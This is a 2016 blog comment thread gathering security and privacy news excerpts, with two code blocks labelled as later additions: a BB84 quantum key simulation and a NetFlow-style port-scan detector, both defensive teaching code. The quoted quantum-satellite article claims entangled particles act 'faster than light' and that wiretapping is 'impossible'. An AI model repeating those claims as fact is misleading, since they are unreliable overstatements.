    http://www.politico.com/story/2016/08/social-media-screening-privacy-227287

    Internet giants including Google, Facebook and Twitter slammed the Obama administration on Monday for a proposal that would seek to weed out security threats by asking foreign visitors about their social media accounts.

    The Department of Homeland Security for months has weighed whether to prompt foreign travelers arriving on visa waivers to disclose the social media websites they use — and their usernames for those accounts — as it seeks new ways to spot potential terrorist sympathizers.

    Read more: http://www.politico.com/story/2016/08/social-media-screening-privacy-

    Reply
  36. Tomi Engdahl says:

    WikiLeaks exposed sensitive data on hundreds of innocent people, including rape victims
    http://www.theverge.com/2016/8/23/12601444/wikileaks-personal-data-exposed-rape-victims-saudi-arabia

    AP report adds to growing concerns over how transparency group handles sensitive information

    WikiLeaks has exposed the personal data on hundreds of ordinary citizens, including rape victims, sick children, and the mentally ill, according to a report published today by the Associated Press. In its analysis, the AP found that the transparency group published medical files on “scores” of innocent people, and that it “routinely” publishes other sensitive information that can be exploited by criminals, including identity records and phone numbers.

    WikiLeaks has long committed itself to exposing government secrets through the publication of diplomatic cables and other classified information. But the organization has come under increased criticism for the way it handles personal data, after it published emails sent by Turkey’s ruling AKP party and the Democratic National Committee (DNC) in July. In the DNC leak, WikiLeaks did not redact social security numbers and credit card information, and it faced criticism for publishing a “special database” on nearly every female Turkish voter as part of the AKP leak. (Links to the database were later removed.)

    The AP reports that WikiLeaks’ growing collection of documents includes viruses and spam in addition to sensitive information on innocent people.

    Private information on hundreds of people including rape victims exposed on WikiLeaks’ website
    http://www.itv.com/news/2016-08-23/private-information-on-hundreds-of-people-including-rape-victims-exposed-on-wikileaks-website/

    An investigation by the Associated Press (AP) has found that in the last year the radical transparency group has published medical files belonging to scores of ordinary people, while hundreds of others have had sensitive family, financial, or identity records posted online.

    Private lives are exposed as WikiLeaks spills its secrets
    http://bigstory.ap.org/article/b70da83fd111496dbdf015acbb7987fb/private-lives-are-exposed-wikileaks-spills-its-secrets?utm_campaign=SocialFlow&utm_source=Twitter&utm_medium=AP

    WikiLeaks’ global crusade to expose government secrets is causing collateral damage to the privacy of hundreds of innocent people, including survivors of sexual abuse, sick children and the mentally ill, The Associated Press has found.

    In the past year alone, the radical transparency group has published medical files belonging to scores of ordinary citizens while many hundreds more have had sensitive family, financial or identity records posted to the web. In two particularly egregious cases, WikiLeaks named teenage rape victims. In a third case, the site published the name of a Saudi citizen arrested for being gay, an extraordinary move given that homosexuality is punishable by death in the ultraconservative Muslim kingdom.

    “They published everything: my phone, address, name, details,”

    Attempts to reach WikiLeaks founder Julian Assange were unsuccessful; a set of questions left with his site wasn’t immediately answered Tuesday. WikiLeaks’ stated mission is to bring censored or restricted material “involving war, spying and corruption” into the public eye, describing the trove amassed thus far as a “giant library of the world’s most persecuted documents.”

    The library is growing quickly, with half a million files from the U.S. Democratic National Committee, Turkey’s governing party and the Saudi Foreign Ministry added in the last year or so. But the library is also filling with rogue data, including computer viruses, spam, and a compendium of personal records.

    Scott Long, an LGBT rights activist who has worked in the Middle East, said the names of rape victims were off-limits. And he worried that releasing the names of people persecuted for their sexuality only risked magnifying the harm caused by oppressive officials.

    “You’re legitimizing their surveillance, not combating it,” Long said.

    Dietrich, the transparency activist, said he still supported WikiLeaks “in principle” but had been souring on Assange and his colleagues for a while.

    “One of the labels that they really don’t like is being called ‘anti-privacy activists,’” Dietrich said in a phone interview. “But if you want to live down that label, don’t do stuff like this!”

    Reply
  37. Tomi Engdahl says:

    China Launches First-ever Quantum Communication Satellite
    http://english.cas.cn/head/201608/t20160816_166483.shtml

    In a cloud of thick smoke, the satellite, Quantum Experiments at Space Scale (QUESS), roared into the dark sky on top of a Long March-2D rocket.

    The 600-plus-kilogram satellite will circle the Earth once every 90 minutes after it enters a sun-synchronous orbit at an altitude of 500 kilometers.

    In its two-year mission, QUESS is designed to establish “hack-proof” quantum communications by transmitting uncrackable keys from space to the ground, and provide insights into the strangest phenomenon in quantum physics — quantum entanglement.

    Quantum communication boasts ultra-high security as a quantum photon can neither be separated nor duplicated. It is hence impossible to wiretap, intercept or crack the information transmitted through it.

    With the help of the new satellite, scientists will be able to test quantum key distribution between the satellite and ground stations, and conduct secure quantum communications between Beijing and Xinjiang’s Urumqi.

    QUESS, as planned, will also beam entangled photons to two earth stations, 1,200 kilometers apart, in a move to test quantum entanglement over a greater distance, as well as test quantum teleportation between a ground station in Ali, Tibet, and itself.

    SPOOKY & ENTANGLED

    Scientists found that when two entangled particles are separated, one particle can somehow affect the action of the far-off twin at a speed faster than light.

    Scientists liken it to two pieces of paper that are distant from each other: if you write on one, the other immediately shows your writing.

    In the quantum entanglement theory, this bizarre connection can happen even when the two particles are separated by the galaxy.

    By harnessing quantum entanglement, the quantum key technology is used in quantum communications, ruling out the possibility of wiretapping and perfectly securing the communication.

    A quantum key is formed by a string of random numbers generated between two communicating users to encode information. Once intercepted or measured, the quantum state of the key will change, and the information being intercepted will self-destruct.

    Reply
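The interception effect described above (measuring the key disturbs it, so the parties notice), as an added BB84-style simulation that is not part of the original comment or the QUESS project; the intercept-resend eavesdropper model, the 11% abort threshold and the sample fraction are assumptions of this example.

```python
import random

RECT, DIAG = 0, 1     # the two conjugate bases a photon can be prepared or measured in
ABORT_QBER = 0.11     # assumed abort threshold; the article gives no figure


def measure(photon, basis, rng):
    """Measure a photon (bit, basis) in `basis`; a wrong basis yields a random outcome."""
    bit, prepared_in = photon
    return bit if basis == prepared_in else rng.randrange(2)


def bb84(n, eavesdropper, rng, sample_fraction=0.25):
    """Run one BB84 exchange over n photons; return key material and the error rate."""
    a_bits = [rng.randrange(2) for _ in range(n)]
    a_bases = [rng.randrange(2) for _ in range(n)]
    photons = list(zip(a_bits, a_bases))

    if eavesdropper:
        # Intercept-resend: Eve measures in a guessed basis and forwards a fresh photon
        # carrying her result. Every wrong guess randomises the state Bob receives.
        photons = []
        for p in zip(a_bits, a_bases):
            e_basis = rng.randrange(2)
            photons.append((measure(p, e_basis, rng), e_basis))

    b_bases = [rng.randrange(2) for _ in range(n)]
    b_bits = [measure(p, ba, rng) for p, ba in zip(photons, b_bases)]

    # Sifting: bases are compared over the public channel; mismatched positions are dropped.
    keep = [i for i in range(n) if a_bases[i] == b_bases[i]]
    a_key = [a_bits[i] for i in keep]
    b_key = [b_bits[i] for i in keep]

    # Error estimation: sacrifice a sample of sifted bits and compare them publicly.
    # Without an eavesdropper the sample agrees exactly; intercept-resend gives ~25% errors.
    m = max(1, int(len(keep) * sample_fraction))
    errors = sum(1 for i in range(m) if a_key[i] != b_key[i])
    qber = errors / m
    return {
        "qber": qber,
        "aborted": qber > ABORT_QBER,
        "alice_key": a_key[m:],
        "bob_key": b_key[m:],
    }


def run(n, eavesdropper, seed):
    """Convenience wrapper with a fixed seed so results are reproducible."""
    return bb84(n, eavesdropper, random.Random(seed))


if __name__ == "__main__":
    for eve in (False, True):
        r = run(4000, eve, 42)
        print(f"eavesdropper={eve}: QBER={r['qber']:.3f} "
              f"aborted={r['aborted']} key_bits={len(r['alice_key'])}")
```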
  38. Tomi Engdahl says:

    Kaspersky launches its own OS on Russian routers
    Four-year build results in OS that aims to secure industrial control systems, we think
    http://www.theregister.co.uk/2016/08/23/kasperskyos/

    Kaspersky Labs has finished building its eponymously-named operating system after four years of quiet development.

    Little information about the OS has made it onto the English-speaking side of the internet. Kaspersky Labs Russia told Vulture South to wait a few weeks for the English press release for information.

    What we do know is that in 2012 ebullient Kaspersky Lab chief executive officer Eugene Kaspersky described the OS as a ground-up build to help protect industrial control systems.

    A more detailed paper published at the time revealed it would be designed to help protect infrastructure like power stations, electricity grids, and telecommunications networks.

    The paper described the need to protect industrial control systems with a ground-up built operating system and outlined the following design criteria:

    The operating system cannot be based on existing computer code; therefore, it must be written from scratch.
    To achieve a guarantee of security it must contain no mistakes or vulnerabilities whatsoever in the kernel, which controls the rest of the modules of the system. As a result, the core must be 100 percent verified as not permitting vulnerabilities or dual-purpose code.
    For the same reason, the kernel needs to contain a very bare minimum of code, and that means that the maximum possible quantity of code, including drivers, needs to be controlled by the core and be executed with low-level access rights.
    In such an environment there needs to be a powerful and reliable system of protection that supports different models of security.

    It appears the operating system has been deployed in routers manufactured by Russian outfit Kraftway, a company that seems to sell into various industrial control system markets, and verticals including government, healthcare, and education.

    It has been compared to Cisco’s IOS and Huawei’s VRP operating systems.

    Securing Critical Information Infrastructure: Trusted Computing Base
    https://securelist.com/analysis/publications/36594/securing-critical-information-infrastructure-trusted-computing-base/

    Reply
  39. Tomi Engdahl says:

    FBI Finds 14,900 More Documents From Hillary Clinton’s Email Server
    https://news.slashdot.org/story/16/08/22/2034212/fbi-finds-14900-more-documents-from-hillary-clintons-email-server

    The FBI uncovered nearly 15,000 more emails and materials sent to or from Hillary Clinton as part of the agency’s investigation into her use of private email at the State Department. The documents were not among the 30,000 work-related emails turned over to the State Department by her attorneys in December 2014. The State Department confirmed it has received “tens of thousands” of personal and work-related email materials — including the 14,900 emails found by the FBI — that it will review.

    FBI Found 15,000 More Clinton Emails
    http://abcnews.go.com/Politics/fbi-found-15000-clinton-emails/story?id=41576112

    “We found those additional emails in a variety of ways,” Comey explained in July. “Some had been deleted over the years, and we found traces of them on devices that supported or were connected to the private e-mail domain. Others we found by reviewing the archived government e-mail accounts of people who had been government employees at the same time as Secretary Clinton … Still others we recovered from the laborious review of the millions of email fragments dumped into the slack space of the server decommissioned in 2013.”

    The first group of 14,900 emails was ordered released, and a status hearing on Sept. 23 “will determine the release of the new emails and documents,” Boasberg said.

    Reply
  40. Tomi Engdahl says:

    Turkish Journalist Jailed For Terrorism Was Framed, Forensic Report Shows
    https://hardware.slashdot.org/story/16/08/22/2220251/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows

    Turkish investigative journalist Baris Pehlivan spent 19 months in jail, accused of terrorism based on documents found on his work computer. But when digital forensics experts examined his PC, they discovered that those files were put there by someone who removed the hard drive from the case, copied the documents, and then reinstalled the hard drive.

    Turkish Journalist Jailed for Terrorism Was Framed, Forensics Report Shows
    http://motherboard.vice.com/read/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows-1

    Reply
  41. Tomi Engdahl says:

    Intruders Use Virtual Machines on Infected PCs to Hide Their Actions
    SecureWorks observes new technique used by threat actors
    http://news.softpedia.com/news/intruders-use-virtual-machines-on-infected-pcs-to-hide-their-actions-507550.shtml

    SecureWorks reports on a new tactic used by threat actors, who are now attempting to install and run a virtual machine, with the purpose of hiding their malicious actions.

    For the non-connoisseur, virtual machines are emulated file systems, most of the time complete with a fully-running operating system that runs inside your existing operating system. In layman’s terms, it is an OS inside your OS, allowing users to start Linux or Windows 98 just by clicking an icon on their desktop.

    Virtual machines are generally used by software developers to test products and are often embedded in other applications, such as some security software.

    “The adversary had achieved a level of access that allowed them to interact with the Windows Explorer shell via the Terminal Services Client,” SecureWorks Counter Threat Unit (CTU) researchers noted.

    “Figure 1 shows the threat actor using the Microsoft Management Console (MMC) to launch the Hyper-V Manager, which is used to manage Microsoft’s virtual machine (VM) infrastructure,” the team added.

    “VMs can hide malicious actions from security products”

    The intruder tried to start a virtual machine on the infected host. Fortunately for the compromised company, the machine the intruder managed to gain access to was a virtual machine itself, and virtual machines can’t be nested inside each other.

    The attacker failed in his attempt, but this shows a new tactic threat actors are now using to hide their activity on hacked systems.

    Virtual Machines Used to Hide Activity?
    Adversaries could use virtual machines to remove evidence of activity
    https://www.secureworks.com/blog/virtual-machines-used-to-hide-activity

    Reply
  42. Tomi Engdahl says:

    Crims share vulns but vendors don’t. This needs fixing
    Centrify’s strategy man says attack re-use is an opportunity for better security
    http://www.theregister.co.uk/2016/08/23/david_mcneely_vendors_still_shy_on_vuln_sharing/

    Attackers like to re-use code, but vendors don’t find out because they don’t share, according to Centrify’s David McNeely.

    In Sydney for Gartner’s Security and Risk Management Summit, McNeely – the company’s veep of product strategy – said that realisation was driven home to him during the recent Black Hat conference in Las Vegas.

    Just like anybody working with software, black-hats prefer the tried-and-true to creating something new.

    This year’s point-of-sale horrors are a good example: “Attackers tend to re-use their technologies,” McNeely said. “If they work out something in a point-of-sale system, they try it again and again.

    “The industry needs to share information about what happens, how the attack worked, how to prevent it.”

    That means overcoming the all-too-common shyness and shame: vendors dislike being “outed”, dislike outing themselves even more, and are fearful of going public in case knowledge enables more attacks.

    “People are shy about how they secure things, in case they give away too much information about how a breach happened,” he added.

    Reply
  43. Tomi Engdahl says:

    US Customs and Border Protection Wants To Know Who You Are On Twitter
    https://news.slashdot.org/story/16/08/23/062214/us-customs-and-border-protection-wants-to-know-who-you-are-on-twitter

    U.S. border control agents want to gather Facebook and Twitter identities from visitors from around the world. But this flawed plan would violate travelers’ privacy, and would have a wide-ranging impact on freedom of expression — all while doing little or nothing to protect Americans from terrorism.
    A proposal has been issued by U.S. Customs and Border Protection to collect social media handles from visitors to the United States from visa waiver countries.

    This plan “would unfairly violate the privacy of innocent travelers,” would cause “innocent travelers” to “engage in self-censorship, cutting back on their online activity out of fear of being wrongly judged by the U.S. government,” and would lead to a “slippery slope, where CBP would require U.S. citizens and residents returning home to disclose their social media handles, or subject both foreign visitors and U.S. persons to invasive device searches at ports of entry with the intent of easily accessing any and all cloud data.”

    U.S. Customs and Border Protection Wants to Know Who You Are on Twitter—But It’s a Flawed Plan
    https://www.eff.org/deeplinks/2016/08/us-customs-and-border-protection-wants-know-who-you-are-twitter-its-flawed-plan

    CBP specifically seeks “information associated with your online presence—Provider/Platform—Social media identifier” in order to provide DHS “greater clarity and visibility to possible nefarious activity and connections” for “vetting purposes.”

    In our comments, we argue that would-be terrorists are unlikely to disclose social media identifiers that reveal publicly available posts expressing support for terrorism.

    But this plan would be more than just ineffective. It’s vague and overbroad, and would unfairly violate the privacy of innocent travelers. Sharing your social media account information often means sharing political leanings, religious affiliations, reading habits, purchase histories, dating preferences, and sexual orientations, among many other personal details.

    Reply
  44. Tomi Engdahl says:

    Turkish Journalist Jailed for Terrorism Was Framed, Forensics Report Shows
    https://motherboard.vice.com/read/turkish-journalist-jailed-for-terrorism-was-framed-forensic-report-shows-1

    Turkish investigative journalist Barış Pehlivan spent 19 months in jail, accused of terrorism based on documents found on his work computer. But when digital forensics experts examined his PC, they discovered that those files were put there by someone who removed the hard drive from the case, copied the documents, and then reinstalled the hard drive.

    The attackers also attempted to control the journalist’s machine remotely, trying to infect it using malicious email attachments and thumb drives. Among the viruses detected in his computer was an extremely rare trojan called Ahtapot, in one of the only times it’s been seen in the wild.

    “We have never seen a computer attacked as ferociously as Barış’s. The attackers seemed to pull everything out of their bag of tricks,” Mark Spencer, digital forensics expert at Arsenal Consulting, said.

    Pehlivan went to jail in February of 2011, along with six of his colleagues, after electronic evidence seized during a police raid in 2011 appeared to connect all of them to Ergenekon, an alleged armed group accused of terrorism in Turkey.

    It is not clear who perpetrated the attack.

    Reply
  45. Tomi Engdahl says:

    Virtualization benefits for manufacturers
    http://www.controleng.com/single-article/virtualization-benefits-for-manufacturers/daa91a8399bc7c1a2c562af26f46595f.html?OCVALIDATE&ocid=101781

    Virtualization growth in manufacturing is continuing as more end users are taking advantage of the cost benefits it offers such as increased efficiency, reduced costs, and better security.

    The goal is to the keep the network up and running by eliminating any unplanned downtime, so that is where network monitoring comes into play as a strong tool to alert and keep end users aware of nuances and changes going on in a network. In short, increase network visibility.

    Virtualization is growing in all industries, especially manufacturing

    From a hardware perspective, virtualization makes it possible to run more applications on the same hardware, which translates into cost savings. If less servers are purchased, then there will be fewer capital expenditures and maintenance costs.

    Virtual machines can end up centrally managed and monitored, which allows a manufacturer to more easily achieve greater process consistency across the enterprise. Benefits include ease of continuous process improvement, greater agility and less training burden as employees transfer, or leave the company, get promoted, or retire.

    By separating software from hardware updates, a virtual IT environment might offer benefits to ease this management lifecycle of software and OS system updates. Hardware purchases can also occur on a regular or scheduled basis, resulting in greater consistency in system specifications.

    Virtualization provides greater cost savings

    As mentioned, virtualization is growing on the industrial, or OT, side. Automation’s gains over the past decade have come from the ability to connect business systems to the plant floor and drive factories based on orders received and collect data out of the plant and use that to analyze and improve performance. Knowing and understanding all that, end users are deriving great cost savings by virtualizing PCs onto fewer physical servers.

    When doing that, the top benefit is cost savings and another benefit is manufacturers are protecting themselves against hardware failure.

    The issue is all about knowing the network and understanding what is going on. That all can happen once the user develops a baseline of what the network should look like. Then they can find and determine discrepancies.

    Defense-in-depth tool

    Whether it is a virtual environment or a regular physical network, in today’s Internet-connected manufacturing environment, network monitoring becomes another strong tool in solid defense in depth program.

    From a security perspective, the goal is to ensure the network stays up as much as possible, which minimizes downtime and maximizes operational return.

    The biggest risk on a network is when something that impacts the business such as a distributed denial of service (DDoS) attack or when someone is trying to find an exploit and are running scanners across the network. By monitoring NetFlow traffic, it is possible to report on unusual activity on unknown ports and provide that information in real time as it is happening. NetFlow is a feature on Cisco routers that provides the ability to collect IP network traffic as it enters or exits an interface.

    Because it is possible to report on things connected or disconnected on the network, if there are critical connections on the network that go down which are mission critical, the network monitoring tool can immediately alert the user the second the tool receives an outage notice from a device. The tool can inform the administrator of a fault before they realize it has happened on the network.

    OT growth coming

    Network monitoring has been a staple in the IT industry for a decade or so and the manufacturing automation industry is just now starting to pick up on the benefits that visibility bring.

    OT networks tend to be a lot smaller than IT networks, but that is in the process of changing, especially with the looming shift to the Industrial Internet of Things (IIoT). When that happens, and there are industry pundits saying it will happen en masse sooner than later, the number of network connected devices is absolutely going to mushroom. So most likely in two years, network monitoring will be as important in this industry as it already is in IT.

    Reply
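The baseline-then-deviation monitoring the article describes (unknown ports reported as they appear, a source sweeping many ports), as an added example that is not part of the original article or of any NetFlow collector; the flow records are constructed, simplified 5-tuples rather than a real NetFlow export, and the scan threshold is an assumption.

```python
from collections import defaultdict

# Constructed flow records (src, dst, proto, dport, bytes); not real captures.
BASELINE_FLOWS = [
    ("10.0.1.10", "10.0.2.20", "tcp", 502, 1200),   # HMI -> PLC (Modbus/TCP)
    ("10.0.1.11", "10.0.3.30", "tcp", 1433, 8800),  # historian -> SQL server
    ("10.0.1.10", "10.0.0.5", "udp", 53, 120),      # HMI -> DNS
    ("10.0.1.11", "10.0.0.5", "udp", 53, 110),      # historian -> DNS
]

LIVE_FLOWS = BASELINE_FLOWS + [
    ("10.0.5.9", "10.0.2.20", "tcp", 21, 60),       # unknown host probing the PLC
    ("10.0.5.9", "10.0.2.20", "tcp", 22, 60),
    ("10.0.5.9", "10.0.2.20", "tcp", 23, 60),
    ("10.0.5.9", "10.0.2.20", "tcp", 80, 60),
    ("10.0.5.9", "10.0.2.20", "tcp", 443, 60),
    ("10.0.5.9", "10.0.2.20", "tcp", 8080, 60),
    ("10.0.1.11", "10.0.3.30", "tcp", 3389, 4000),  # known host, but RDP is new for it
]


def build_baseline(flows):
    """Learn which (dst, proto, dport) services each source normally talks to."""
    baseline = defaultdict(set)
    for src, dst, proto, dport, _ in flows:
        baseline[src].add((dst, proto, dport))
    return baseline


def detect(flows, baseline, scan_threshold=5):
    """Report flows that deviate from the baseline; scan_threshold is an assumed tuning value."""
    alerts = []
    unknown_by_src = defaultdict(set)
    new_sources = set()
    for src, dst, proto, dport, _ in flows:
        if src not in baseline and src not in new_sources:
            new_sources.add(src)
            alerts.append({"type": "new-source", "src": src})
        svc = (dst, proto, dport)
        if svc in baseline.get(src, set()):
            continue
        unknown_by_src[src].add(svc)
        alerts.append({"type": "new-port", "src": src, "dst": dst,
                       "proto": proto, "dport": dport})
    # One source touching many unfamiliar ports looks like the scanner the article mentions.
    for src, svcs in unknown_by_src.items():
        ports = sorted({dport for _, _, dport in svcs})
        if len(ports) >= scan_threshold:
            alerts.append({"type": "scan", "src": src, "ports": ports})
    return alerts


if __name__ == "__main__":
    for alert in detect(LIVE_FLOWS, build_baseline(BASELINE_FLOWS)):
        print(alert)
```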
  46. Tomi Engdahl says:

    Breached dating site’s murky practices are revealed: false promises and illegal billing

    Ashley Madison, the cheating web site compromised in a giant breach in 2015, has been caught making false promises of security and retaining users’ information without authorization. The matter has been investigated by authorities both in Canada and in Australia.

    In last year’s incident, leaked data revealed the user information of 36 million people, including names, credit card numbers, and in some cases sexual fantasies.

    Before last year’s breach, the site had displayed a medal icon declaring that the site had a trusted security certificate. Ashley Madison administrators have since removed the icon from the site after acknowledging that it was fake.

    In addition to the trumped-up security ratings, the authorities considered the way Ashley Madison handles user data unsuitable.

    Source: http://www.tivi.fi/Kaikki_uutiset/murretun-deittisivuston-hamarat-kaytannot-paljastuvat-perattomia-lupauksia-ja-laitonta-laskuttamista-6576350

    Reply
  47. Tomi Engdahl says:

    FBI Investigating Russian Hack Of New York Times Reporters, Others
    https://yro.slashdot.org/story/16/08/23/1831217/fbi-investigating-russian-hack-of-new-york-times-reporters-others

    Hackers thought to be working for Russian intelligence have carried out a series of cyber breaches targeting reporters at the New York Times and other U.S. news organizations, reports CNN, citing US officials briefed on the matter. From the report:
    The intrusions, detected in recent months, are under investigation by the FBI and other US security agencies. Investigators so far believe that Russian intelligence is likely behind the attacks and that Russian hackers are targeting news organizations as part of a broader series of hacks that also have focused on Democratic Party organizations, the officials said. “Like most news organizations we are vigilant about guarding against attempts to hack into our systems,” said New York Times Co. spokeswoman Eileen Murphy.

    First on CNN: FBI investigating Russian hack of New York Times reporters, others
    http://edition.cnn.com/2016/08/23/politics/russia-hack-new-york-times-fbi/index.html?adkey=bn

    Hackers thought to be working for Russian intelligence have carried out a series of cyber breaches targeting reporters at The New York Times and other US news organizations, according to US officials briefed on the matter.
    The intrusions, detected in recent months, are under investigation by the FBI and other US security agencies. Investigators so far believe that Russian intelligence is likely behind the attacks and that Russian hackers are targeting news organizations as part of a broader series of hacks that also have focused on Democratic Party organizations, the officials said.

    The Times said email services for employees are outsourced to Google. CNN requested comment from Google but didn’t receive comment. The FBI declined to comment.

    Reply
  48. Tomi Engdahl says:

    FBI Authorized Informants To Break The Law 22,800 Times In 4 Years
    https://news.slashdot.org/story/16/08/23/221212/fbi-authorized-informants-to-break-the-law-22800-times-in-4-years

    Over a four-year period, the FBI authorized informants to break the law more than 22,800 times, according to newly reviewed documents. Official records obtained by the Daily Dot under the Freedom of Information Act show the Federal Bureau of Investigation gave informants permission at least 5,649 times in 2013 to engage in activity that would otherwise be considered a crime.

    FBI authorized informants to break the law 22,800 times in 4 years
    http://www.dailydot.com/layer8/fbi-informants-otherwise-criminal-activity-report-foia/

    Reply
  49. Tomi Engdahl says:

    Ashley Madison Security Protocols Violated Canada, Australia Privacy Laws
    https://news.slashdot.org/story/16/08/23/2113209/ashley-madison-security-protocols-violated-canada-austrialia-privacy-laws

    The Office of the Privacy Commissioner of Canada said Tuesday that the Canada-based online dating and social networking service Ashley Madison used inadequate privacy and security technology while marketing itself as a discreet and secure way for consenting adults to have affairs.

    AshleyMadison security protocols violated privacy laws, watchdog says
    http://www.cbc.ca/news/business/ashley-madison-privacy-security-1.3732413

    Reply
